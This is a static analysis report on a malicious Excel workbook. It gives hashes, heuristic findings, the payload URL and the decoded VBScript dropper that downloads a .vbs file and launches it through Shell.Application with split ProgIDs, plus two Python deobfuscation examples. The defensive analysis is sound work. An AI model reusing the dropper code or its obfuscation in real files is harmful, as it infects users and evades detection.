Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 1ec1cc958005b77e…

MALICIOUS

Office (OOXML) / .XLSX

Size: 429.9 KB
Created: 2025-07-15 07:44:31 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2026-05-13
MD5: 3a373cee613155ed534cd43876db4793
SHA-1: 5f3ea9abf18937862833e46aa38fe8e6988cb545
SHA-256: 1ec1cc958005b77e4c8ef402355f4a7b83c6827f720a11ca10e75a8ed84e47f7
Risk score: 182

Heuristics (4)

  • [critical] OOXML_XLM_MACROSHEET: Excel 4.0 macro sheet (1 sheet); 2 related findings
    The spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened the XLM defaults; legitimate XLM use in a modern workbook is rare. Here the macro sheet is stored as a BIFF12 binary part (an XLSB-style .bin) rather than as XML, which XML-only OOXML scanners do not parse at all.
  • [critical] OOXML_XLM_REASSEMBLED_PAYLOAD: XLM payload reassembled from CHAR()/split formulas
    The macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and short string fragments, so no WinAPI name, shell command or URL is ever contiguous in the .bin for a literal-byte scan to match. Reassembling the formulas recovers the de-obfuscated download-and-run chain: download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell) or the payload URL.
  • [critical] OOXML_XLM_CELL_ARRAY_URL: URL reconstructed from XLM cell array (1 URL)
    The macro sheet stages its payload URL non-contiguously: one ASCII character code per numeric cell, inside an embedded HTA that uses VBScript Chr()/& concatenation, or as multi-character fragments that a download formula joins by cell reference (=A1&A2&… or CONCATENATE(...)). Literal URL extraction therefore never sees the URL, because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part, decoding RK, inline-string and shared-string cells in both row-major and column-major order, and concatenating FORMULA cell references in token order.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. A URL is not by itself a detection; the label on each URL names the channel (macro, JS, link annotation, document body, ...) that reached it.
    URL: http://astaoffices.com/ms/md.vbs (referenced by macro)
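The recovery the two XLM findings describe (walking numeric cells in row-major and column-major order for one-charcode-per-cell strings, and joining fragments by cell reference, CHAR() and CONCATENATE() in formula token order), as an added worked example. This is illustrative code written for this page, not the scanner's implementation: the grid layout, the cell contents and the example.invalid URLs are constructed, and the evaluator covers only the concatenation subset of XLM, raising on any other function so that an unsupported formula is never silently mis-read.

```python
"""Reconstruct strings an XLM dropper staged across cells (added example)."""
import re
from typing import Dict, List, Tuple, Union

Cell = Tuple[int, int]                      # (row, col), 1-based as in Excel
Grid = Dict[Cell, Union[int, float, str]]   # numbers = RK cells, "=..." = formulas

URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
TOKEN_RE = re.compile(
    r'"((?:[^"]|"")*)"'               # 1: string literal, "" escapes a quote
    r"|CHAR\(([^()]+)\)"              # 2: CHAR(n) or CHAR(ref)
    r"|(\$?[A-Za-z]{1,3}\$?\d+)"      # 3: cell reference
    r"|(CONCATENATE\(|&|,|\)|\s+)",   # 4: glue; every operand is concatenated
    re.I,
)


def col_index(col: str) -> int:
    """'A' -> 1, 'Z' -> 26, 'AA' -> 27."""
    n = 0
    for ch in col.upper():
        n = n * 26 + ord(ch) - 64
    return n


def col_letter(n: int) -> str:
    s = ""
    while n:
        n, rem = divmod(n - 1, 26)
        s = chr(65 + rem) + s
    return s


def parse_ref(ref: str) -> Cell:
    m = re.fullmatch(r"\$?([A-Za-z]+)\$?(\d+)", ref)
    if not m:
        raise ValueError(f"bad cell reference {ref!r}")
    return int(m.group(2)), col_index(m.group(1))


def cell_text(cell: Cell, grid: Grid, depth: int = 0) -> str:
    """Text of a cell as Excel renders it; formulas are evaluated, ints lose the '.0'."""
    v = grid.get(cell, "")
    if isinstance(v, str):
        return eval_formula(v, grid, depth) if v.startswith("=") else v
    return str(int(v)) if float(v).is_integer() else str(v)


def eval_formula(text: str, grid: Grid, depth: int = 0) -> str:
    """Evaluate the concatenation subset droppers use: literals, CHAR(n), CHAR(ref),
    cell references, & and CONCATENATE(). Any other token raises ValueError."""
    if depth > 32:
        raise RecursionError("reference cycle or excessive nesting")
    body = text[1:] if text.startswith("=") else text
    parts, pos = [], 0
    while pos < len(body):
        m = TOKEN_RE.match(body, pos)
        if not m:
            raise ValueError(f"unsupported token at {body[pos:pos + 20]!r}")
        lit, code, ref, _glue = m.groups()
        if lit is not None:
            parts.append(lit.replace('""', '"'))
        elif code is not None:
            arg = code.strip()
            n = int(arg) if arg.isdigit() else int(float(cell_text(parse_ref(arg), grid, depth + 1)))
            parts.append(chr(n))
        elif ref is not None:
            parts.append(cell_text(parse_ref(ref), grid, depth + 1))
        pos = m.end()
    return "".join(parts)


def charcode_runs(grid: Grid, row_major: bool, min_len: int = 6) -> List[str]:
    """Walk numeric cells in row-major or column-major order and join runs of
    adjacent printable-ASCII codes; any other cell or a gap ends the run."""
    order = (lambda k: (k[0], k[1])) if row_major else (lambda k: (k[1], k[0]))
    runs, buf, prev = [], [], None
    for key in sorted(grid, key=order):
        adjacent = prev is not None and (
            key == (prev[0], prev[1] + 1) if row_major else key == (prev[0] + 1, prev[1]))
        v = grid[key]
        is_code = isinstance(v, (int, float)) and float(v).is_integer() and 32 <= int(v) < 127
        if not (adjacent and is_code):
            if len(buf) >= min_len:
                runs.append("".join(buf))
            buf = []
        if is_code:
            buf.append(chr(int(v)))
        prev = key
    if len(buf) >= min_len:
        runs.append("".join(buf))
    return runs


def reconstruct(grid: Grid) -> Dict[str, object]:
    """Run every recovery strategy over a grid and pull URLs out of the results."""
    formulas = {f"{col_letter(c)}{r}": eval_formula(v, grid)
                for (r, c), v in sorted(grid.items())
                if isinstance(v, str) and v.startswith("=")}
    row_major = charcode_runs(grid, row_major=True)
    col_major = charcode_runs(grid, row_major=False)
    urls = sorted({u for s in row_major + col_major + list(formulas.values())
                   for u in URL_RE.findall(s)})
    return {"row_major": row_major, "col_major": col_major, "formulas": formulas, "urls": urls}


# Constructed sample grid (not from the analysed workbook): column A holds a URL
# one charcode per row, column B holds fragments, column C the reassembling formulas.
SAMPLE_URL = "http://example.invalid/payload.vbs"
SAMPLE_GRID: Grid = {(i, 1): ord(ch) for i, ch in enumerate(SAMPLE_URL, start=1)}
SAMPLE_GRID.update({
    (1, 2): "http://", (2, 2): "example.inva", (3, 2): "lid/stage2.vbs",
    (1, 3): "=B1&B2&B3",
    (2, 3): "=CONCATENATE(CHAR(119),CHAR(115),CHAR(99),CHAR(114),CHAR(105),CHAR(112),CHAR(116))",
    (3, 3): '=CHAR(A1)&CHAR(A2)&CHAR(A3)&CHAR(A4)&":"&"//"',
})

if __name__ == "__main__":
    for name, value in reconstruct(SAMPLE_GRID).items():
        print(name, value)
```

On the sample grid the row-major walk finds nothing (every charcode in column A is followed by a string cell in column B), the column-major walk yields the full URL, and the three formulas evaluate to a second URL, the string wscript and http:// respectively; only walking both orders and evaluating formulas, as the finding text says the scanner does, recovers everything.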

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_sheet_00.bin
Kind: xlm-macrosheet
Source: OOXML XLM macro sheet, part xl/macrosheets/sheet1.bin
Size: 3303 bytes
SHA-256: bd5e8ce2dc81a135b234c07676a4520dab881fbac0655fc44db18060bcb1364f
Preview script
The extracted part is BIFF12 binary, not a text script. The raw preview renders the UTF-16LE cell strings with their NUL bytes as spaces and interleaves them with record headers; decoding those strings in stream order gives the macro cells below (fragments that are not legible in the preview are shown as …, and a stray byte the preview shows inside GetObject has been dropped). The first cells hold the strings kfu, C:\Users\Public\, fil and fi7rer.vbs; the cells that follow are the lines of a VBScript, one statement per cell:

  On Error Resume Next
  bk35hu = "micrOs"
  plddrf = "aDo"
  qfvpap = "db.sTr"
  vqc34g = "oft.xmlh"
  a2mrwb = "…"
  dim uzh3ri: Set uzh3ri = createobject(plddrf & qfvpap & "eam")
  dim sm8ats: Set sm8ats = createobject(bk35hu & vqc34g & "TTP")
  sm8ats.Open "GET", a2mrwb, False
  sm8ats.Send
  with uzh3ri
    .type = 1
    .open
    .write sm8ats.responseBody
    .savetofile "C…Mswords.vbs", 2
  end with
  GetObject("new:13709620-C279-11CE-A49E-444553540000").Open("C…Mswords.vbs")
  Err.Clear

The last legible cell is the command wscript C…fi7rer.vbs. The remainder of the dump is the binary sheet trailer (an algorithm-name string SHA-512 and the page-setup doubles) and contains no further strings.

Read together, the cells spell out the kill chain. The string constants are split so that no ProgID is contiguous in the part: plddrf & qfvpap & "eam" yields aDodb.sTream (ADODB.Stream; ProgIDs are case-insensitive) and bk35hu & vqc34g & "TTP" yields micrOsoft.xmlhTTP (Microsoft.XMLHTTP). The script fetches the URL held in a2mrwb (its literal is not legible in this preview; the EMBEDDED_URL finding above attributes http://astaoffices.com/ms/md.vbs to the macro), writes the response body to a file named Mswords.vbs as a binary stream (.type = 1 is adTypeBinary; the 2 passed to .savetofile is adSaveCreateOverWrite), and opens that file through the object created from the "new:" moniker: CLSID 13709620-C279-11CE-A49E-444553540000 is Shell.Application, whose Open method launches the dropped script via ShellExecute. On Error Resume Next and Err.Clear suppress any failure along the way. The trailing wscript C…fi7rer.vbs cell is consistent with the XLM writing this VBScript to fi7rer.vbs and starting it with wscript.exe, although the formula tokens around the file-writing cells are not legible in the preview.
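One way to turn a BIFF12 part like xlm_sheet_00.bin into the readable statements above and to fold the split ProgIDs back together, as an added example written for this page (not the scanner's code). It carves UTF-16LE strings from the binary part the way strings -el does, then propagates VBScript string constants through & chains (including Chr() obfuscation) and reports the ProgIDs passed to createobject(). The byte blob and script lines are constructed to mirror the dump; the variable names and the example.invalid URL are hypothetical.

```python
"""Carve UTF-16LE strings from a binary sheet part and fold split VBScript
string constants back together (added example)."""
import re
from typing import Dict, List, Optional

# Runs of printable ASCII stored as UTF-16LE (char, NUL) pairs, like `strings -el`.
WIDE_RUN_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
# One VBScript operand: a string literal, Chr(n), or an identifier.
OPERAND = r'(?:"(?:[^"]|"")*"|Chr\(\s*\d+\s*\)|[A-Za-z_]\w*)'
OPERAND_RE = re.compile(OPERAND, re.I)
CHAIN_RE = re.compile(OPERAND + r"(?:\s*&\s*" + OPERAND + r")+", re.I)
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*"((?:[^"]|"")*)"\s*$')
CREATEOBJECT_RE = re.compile(r'createobject\(\s*"([^"]+)"\s*\)', re.I)


def carve_utf16le(blob: bytes) -> List[str]:
    """Every UTF-16LE run of four or more printable characters, in stream order.
    The regex tries every byte offset, so no alignment assumption is needed."""
    return [m.group().decode("utf-16-le") for m in WIDE_RUN_RE.finditer(blob)]


def _operand_value(tok: str, consts: Dict[str, str]) -> Optional[str]:
    if tok.startswith('"'):
        return tok[1:-1].replace('""', '"')
    m = re.fullmatch(r"Chr\(\s*(\d+)\s*\)", tok, re.I)
    if m:
        return chr(int(m.group(1)))
    return consts.get(tok.lower())      # VBScript names are case-insensitive; None if unknown


def fold_line(line: str, consts: Dict[str, str]) -> str:
    """Replace each `a & "b" & Chr(99)` chain whose operands are all known by one literal;
    a chain containing an unknown identifier is left untouched."""
    def repl(m):
        vals = [_operand_value(t, consts) for t in OPERAND_RE.findall(m.group(0))]
        if any(v is None for v in vals):
            return m.group(0)
        return '"' + "".join(vals).replace('"', '""') + '"'
    return CHAIN_RE.sub(repl, line)


def deobfuscate(lines: List[str]) -> List[str]:
    """Single forward pass: fold chains, then learn any `name = "literal"` the line defines."""
    consts: Dict[str, str] = {}
    out = []
    for line in lines:
        folded = fold_line(line, consts)
        m = ASSIGN_RE.match(folded)
        if m:
            consts[m.group(1).lower()] = m.group(2).replace('""', '"')
        out.append(folded)
    return out


def progids(lines: List[str]) -> List[str]:
    """ProgIDs handed to createobject() after folding, lower-cased (ProgIDs are case-insensitive)."""
    return [p.lower() for line in lines for p in CREATEOBJECT_RE.findall(line)]


def analyze(blob: bytes) -> Dict[str, object]:
    folded = deobfuscate(carve_utf16le(blob))
    return {"folded": folded, "progids": progids(folded)}


# Constructed sample modelled on the dump above, with hypothetical names and URL.
SAMPLE_SCRIPT = [
    "On Error Resume Next",
    'v1 = "micrOs"',
    'v2 = "aDo"',
    'v3 = "db.sTr"',
    'v4 = "oft.xmlh"',
    'v5 = "http://example.invalid/stage2.vbs"',
    'Set st = createobject(v2 & v3 & "eam")',
    'Set hx = createobject(v1 & v4 & "TTP")',
    'hx.Open "GET", v5, False',
    'Set sh = GetObject("new:" & Chr(49) & "3709620-C279-11CE-A49E-444553540000")',
]
# Each statement as a UTF-16LE cell string, separated by record-header-like junk bytes.
SAMPLE_BLOB = (b"\x13\x37" + b"\x00\x00\x00\x01\x00".join(s.encode("utf-16-le") for s in SAMPLE_SCRIPT)
               + b"\x00\x00\x7f")

if __name__ == "__main__":
    result = analyze(SAMPLE_BLOB)
    print("\n".join(result["folded"]))
    print("ProgIDs:", result["progids"])
```

The folded output names adodb.stream and microsoft.xmlhttp, the same pair the dump's split constants resolve to, and reassembles the "new:" moniker around CLSID 13709620-C279-11CE-A49E-444553540000 (Shell.Application). Chains that reference a variable the pass has not seen, such as the URL variable when its literal is missing from a truncated dump, are deliberately left as written rather than guessed.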